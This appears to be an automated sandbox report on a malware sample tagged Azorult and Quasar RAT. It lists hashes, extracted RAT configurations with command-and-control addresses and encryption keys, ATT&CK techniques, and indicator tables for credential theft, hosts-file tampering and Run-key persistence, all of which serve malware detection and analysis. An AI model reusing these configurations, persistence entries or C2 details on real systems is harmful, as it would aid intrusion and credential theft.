azorult | cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12/12/2024, 18:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

azorult quasar aquarius office su-pc collection credential_access defense_evasion discovery execution infostealer persistence privilege_escalation spyware stealer trojan upx

Malware Config

Extracted

Family

quasar

Version

1.4.0.0

Botnet

Office

82.117.243.110:5173

Mutex

yfsS9ida0wX8mgpdJC

Attributes

encryption_key
KDNBgA8jiBeGX1rj1dDt
install_name
csrss.exe
log_directory
Logs
reconnect_delay
3000
startup_key
NET framework
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

Aquarius

192.168.8.103:4782

192.168.8.105:4782

192.168.8.114:4782

Mutex

a198a147-9efc-419d-9539-bac2108dc109

Attributes

encryption_key
4CF458F992C472DE78F317085B34A8A1747FC32D
install_name
WindowsDataUpdater.exe
log_directory
Logs
reconnect_delay
3000
startup_key
WindowsDataUpdater
subdirectory
WinBioData

Extracted

Family

quasar

Version

1.4.1

Botnet

su-pc

192.168.100.2:4444

Mutex

47a88def-94f4-406d-86f5-8b0b767128df

Attributes

encryption_key
6B74F0C858B7E90573D4E97997F2A082B9781250
install_name
x.exe
log_directory
Logs
reconnect_delay
3000
startup_key
x
subdirectory
SubDir

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 6 IoCs

resource	yara_rule
behavioral4/files/0x000a000000023b66-29.dat	family_quasar
behavioral4/memory/4736-37-0x0000000000450000-0x000000000049E000-memory.dmp	family_quasar
behavioral4/files/0x000a000000023b71-67.dat	family_quasar
behavioral4/files/0x000a000000023b6c-77.dat	family_quasar
behavioral4/memory/2888-90-0x0000000000970000-0x0000000000C94000-memory.dmp	family_quasar
behavioral4/memory/4388-159-0x0000000000310000-0x0000000000634000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3328	powershell.exe
1100	powershell.exe
4288	powershell.exe
6052	powershell.exe
2336	powershell.exe
3720	Process not Found
4808	Process not Found
2436	powershell.exe
228	powershell.exe
5200	powershell.exe
6060	powershell.exe
5896	powershell.exe
5972	powershell.exe
4872	powershell.exe
5272	powershell.exe
5968	Process not Found
456	Process not Found
2684	powershell.exe
4512	powershell.exe
3536	powershell.exe
2492	powershell.exe
1736	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Drops file in Drivers directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	WindowsDefenderUpdater.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	WindowsDefenderUpdater.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	WindowsDefenderUpdater.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	WindowsDefenderUpdater.exe

Checks computer location settings 2 TTPs 63 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	jtkhikadjthsad.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Aquarius.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	java.exe

Clipboard Data 1 TTPs 10 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5692	Process not Found
3704	cmd.exe
2480	powershell.exe
5804	powershell.exe
5008	cmd.exe
1312	Process not Found
1964	cmd.exe
2248	powershell.exe
5080	cmd.exe
2300	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
1468	lummnew.exe
4420	build9.exe
4736	jerniuiopu.exe
4516	Aquarius.exe
2888	x.exe
3164	WindowsDefenderUpdater.exe
4388	WindowsDataUpdater.exe
3108	WindowsDefenderUpdater.exe
3460	java.exe
4200	WindowsDefenderUpdater.exe
1740	WindowsDataUpdater.exe
4540	java.exe
3744	WindowsDefenderUpdater.exe
820	WindowsDefenderUpdater.exe
2992	WindowsDataUpdater.exe
1532	java.exe
5292	WindowsDefenderUpdater.exe
5424	WindowsDefenderUpdater.exe
5432	WindowsDataUpdater.exe
2648	java.exe
5680	WindowsDefenderUpdater.exe
5212	WindowsDefenderUpdater.exe
5260	java.exe
4176	WindowsDataUpdater.exe
3356	WindowsDefenderUpdater.exe
820	WindowsDefenderUpdater.exe
5824	WindowsDataUpdater.exe
5672	java.exe
3212	WindowsDefenderUpdater.exe
2468	rar.exe
3248	WindowsDefenderUpdater.exe
3400	WindowsDataUpdater.exe
4200	java.exe
4788	WindowsDefenderUpdater.exe
5064	WindowsDefenderUpdater.exe
1368	java.exe
4948	WindowsDataUpdater.exe
5532	WindowsDefenderUpdater.exe
3752	WindowsDefenderUpdater.exe
5148	WindowsDataUpdater.exe
1120	java.exe
2252	WindowsDefenderUpdater.exe
2528	WindowsDefenderUpdater.exe
5660	WindowsDataUpdater.exe
5184	java.exe
1824	WindowsDefenderUpdater.exe
1640	WindowsDefenderUpdater.exe
5480	WindowsDataUpdater.exe
5484	java.exe
5216	WindowsDefenderUpdater.exe
5284	WindowsDefenderUpdater.exe
5596	WindowsDataUpdater.exe
2788	java.exe
4624	WindowsDefenderUpdater.exe
5704	WindowsDefenderUpdater.exe
5688	WindowsDataUpdater.exe
5600	java.exe
5660	WindowsDefenderUpdater.exe
5204	WindowsDefenderUpdater.exe
2128	WindowsDataUpdater.exe
5276	java.exe
5860	WindowsDefenderUpdater.exe
3752	rar.exe
5972	WindowsDefenderUpdater.exe

Loads dropped DLL 64 IoCs

pid	Process
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3108	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
3744	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5292	WindowsDefenderUpdater.exe
5680	WindowsDefenderUpdater.exe
5680	WindowsDefenderUpdater.exe
5680	WindowsDefenderUpdater.exe
5680	WindowsDefenderUpdater.exe
5680	WindowsDefenderUpdater.exe
5680	WindowsDefenderUpdater.exe
5680	WindowsDefenderUpdater.exe
5680	WindowsDefenderUpdater.exe
5680	WindowsDefenderUpdater.exe
5680	WindowsDefenderUpdater.exe
5680	WindowsDefenderUpdater.exe
5680	WindowsDefenderUpdater.exe
5680	WindowsDefenderUpdater.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe"	reg.exe
